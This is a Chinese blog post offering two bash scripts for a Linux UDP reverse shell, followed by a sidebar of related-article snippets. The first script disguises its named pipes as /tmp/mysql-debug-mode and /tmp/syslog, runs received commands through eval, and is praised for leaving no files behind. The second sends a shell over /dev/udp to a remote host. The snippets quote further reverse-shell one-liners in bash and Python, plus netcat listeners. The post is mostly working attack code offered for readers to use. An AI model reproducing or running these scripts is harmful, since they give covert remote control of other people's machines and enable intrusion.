linux udp反弹shell脚本,Linux UDP反弹shell脚本

最新推荐文章于 2024-04-15 00:44:01 发布
最新推荐文章于 2024-04-15 00:44:01 发布
阅读量557 收藏
点赞数
文章标签: linux udp反弹shell脚本

* 无端口 * 成功启动后无残余文件 * 一般情况下没有UDP单包512字节的问题。当然你要是执行奇葩的命令我也没办法 * 非交互式shell,也就是说,你不能用回车来写多行命令。这个问题不是不能解决,而是如果解决这个问题,会造成另外一个我不能忍受的问题。而且反

* 无端口

* 成功启动后无残余文件

* 一般情况下没有UDP单包512字节的问题。当然你要是执行奇葩的命令我也没办法

* 非交互式shell,也就是说,你不能用回车来写多行命令。这个问题不是不能解决,而是如果解决这个问题,会造成另外一个我不能忍受的问题。而且反正可以执行命令了,自己另外反弹一个可交互的shell就是了

* 由于某些bash特性和某些我不能忍受的功能,某些子进程会在链接断开或者输入exit指令一段时间之后才会自动退出

图就不贴了,大家自己玩

#!/bin/bash

REVIP=127.0.0.1

REVPORT=8080

PIPE=/tmp/mysql-debug-mode

PIPE2=/tmp/syslog

TIMEOUT=20

rm -rf $PIPE

mknod $PIPE p

rm -rf $PIPE2

mknod $PIPE2 p

function KeepAlive(){

rm -rf $PIPE

rm -rf $PIPE2

while [ 1 == 1 ]

do

sleep $TIMEOUT

echo Connection: keep-alive or die

done

}

function DoRealShell(){

KeepAlive &

PIDALIVE=$!

while read line

do

if [ "$line" == "exit" ]

then

kill $PIDALIVE

kill $PIDCONN

kill $$

exit

fi

echo executing command: $line

eval $line

done

kill $PIDALIVE

kill $PIDCONN

kill $$

exit

}

function Shell(){

LENGTH=0

DoRealShell | while read line

do

echo $line

done

}

function StartShell(){

Shell >$PIPE2 2>&1

}

function MakeConn(){

echo Welcome back

cat $PIPE2 &

cat - >$PIPE &

}

MakeConn &0 1>&0

PIDCONN=$!

StartShell

rm -rf $PIPE

rm -rf $PIPE2

又研究了一下,其实根本没有那么复杂,而且完美解决退出和多行的问题,上个帖子你们就忽略吧 ‘

77c964a44078b66b4b39b1f2a54ea2ef.png

#!/bin/bash

exec 3>/dev/udp/127.0.0.1/8080

exec 2>&3

exec 1>&3

echo Welcom back

cat 0

晨曦姜
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一个udp实现的shell程序
10-28
UDP 方式实现的SHELL, 用于学习UDP打洞原理, 完善后可用户远程控制linux/unix等基于SHell的操作系统
python 反弹shell,加了UDP
weixin_34349320的博客
03-20 222
2019独角兽企业重金招聘Python工程师标准>>> ...
内网渗透-常用反弹shell方法总结
最新发布
lza20001103的博客
04-15 1378
内网渗透-常用反弹shell方法总结
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1257
什么是反弹shell反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
linux反弹shell命令解析
weixin_34381687的博客
09-02 87
今天在看spark stream的sample样例的时候看到linux的万金油命令nc。搜索相关的内容突然发现一个很好玩的用处就是反弹shell.下面我们就来讲讲反弹shell 1. 什么是反弹shell 简单来说就是A主机可以通过执行B主机上的命令并且把返回值都返回到A上。 2. 反弹shell的用途 这个反弹shell大部分用途是用来...
反弹shell命令
种豆农夫的技术备忘录
08-24 526
节选自 https://www.freebuf.com/vuls/211847.html >> whereis nc bash python exec php nc: /usr/bin/nc /usr/share/man/man1/nc.1.gz bash: /usr/bin/bash /usr/share/man/man1/bash.1.gz python: /usr/bin/p...
linux环境下TCP/UDP批量端口通讯测试shell脚本
12-19
TCP/UDP批量端口测试,可以查看我的博客https://blog.csdn.net/gonepoo/article/details/103612451 直接获取代码,或者是自己下载也行,作者已经在生产环境测试过,很不错,大家可以进行改进操作。
Shell脚本实现Linux系统和进程资源监控
12-11
本文介绍在Linux系统下几种常见的监控需求及其shell脚本的编写。 文章目录: 1.Linux使用 Shell 检查进程是否存在 2.Linux使用 Shell检测进程 CPU 利用率 3.Linux使用 Shell检测进程内存使用量 4.Linux使用 Shell...
Shell脚本定时备份清除运行系统日志的代码
01-10
一、写备份并清除老日志Shell脚本: 代码如下:#!/bin/sh#backup eoslog#author rhao#date 2008-12-27 #定义环境变量EOS_HOME=/home/eosSAS_HOME=/home/eos/SAS # 测试主辅结点if test -d ‘/home/eos/SAS/SAS1_web1...
PowerShell脚本开发之收发UDP消息包
01-09
在上篇文章中,在PSNet工具集中创建了Send-TCPMessage和Receive-TCPMessage两个函数实现了通过PowerShell收发TCP消息包的功能,有了TCP包的发送和接收,自然少不了UDP消息包的发送和接收,本文将会介绍通过...
Bash-shell-scripts:Linux Shell脚本-快速参考示例任务
03-14
Linux Shell脚本-快速参考示例任务 更多学习-乐于助人 对于所有脚本,在运行它们之前,请确保已通过运行以下sudo chmod +x script_name添加了执行权限: sudo chmod +x script_name 列出监听端口的udp和tcp协议脚本...
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
linux下的tcp和udp发包简单发包程序
05-07
以前发过,不过搞忘发头文件了,所以重新发下,把udp的也发上来了。
反弹shell的命令大全
G3et的博客
03-21 820
【代码】反弹shell的命令大全。
Linux反弹shell命令
qq_46804551的博客
02-06 242
Linux反弹shell命令 接收端口和发送端端口要一致 bash反弹shell 接收端: nc -lvp 端口 发送端: bash -i >& /dev/tcp/接收端IP/接收端端口 0>&1 python反弹shell 接收端: nc -lvp 端口 发送端: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con
反弹shell
m0_63510587的博客
11-26 252
反弹shell,是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 在攻击主机上执行端口监听: nc -lvvp port #port 为攻击机的端口号,并此端口未被占用 一、在目标主机上执行: bash -i >& /dev/tcp/0.0.0.0/port 0>&1 #0.0.0....
详解反弹shell命令
shy的博客
04-11 3441
在渗透过程中,经常需要反弹shell,因此总结一下linux反弹shell的几种姿势: bash -i >& /dev/tcp/ip/port 0>&1 bash -i本地打开一个bash >& 输出重定向,将标准输出和标准错误输出都重定向到远程。 /dev/tcp/ip/port/建立一个socket连接到另一个机器上,即远程到其他机...
反弹shell常用命令
mirocky的博客
01-15 8465
反弹shell常用命令 1 attacker端的监听——netcat (1) windows环境下下载netcat 下载地址 将如图的nc.exe所在文件夹添加到环境变量 (2) linux环境下下载netcat yum install netcat (3) 安装结束 使用如下命令判断是否安装成功 nc -h 使用如下命令开始监听 nc -lvvp port 2 靶机命令 (1) bash bash一句话为: bash -i >& /dev/tcp/ip/port 0>&a
linux udp 发送数据shell
07-28
Linux系统中使用shell脚本发送UDP数据可以使用netcat命令。netcat是一个强大的网络工具,可用于在网络上进行数据传输和调试。 以下是一个使用netcat命令发送UDP数据的示例脚本: ``` #!/bin/bash # 目标主机和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值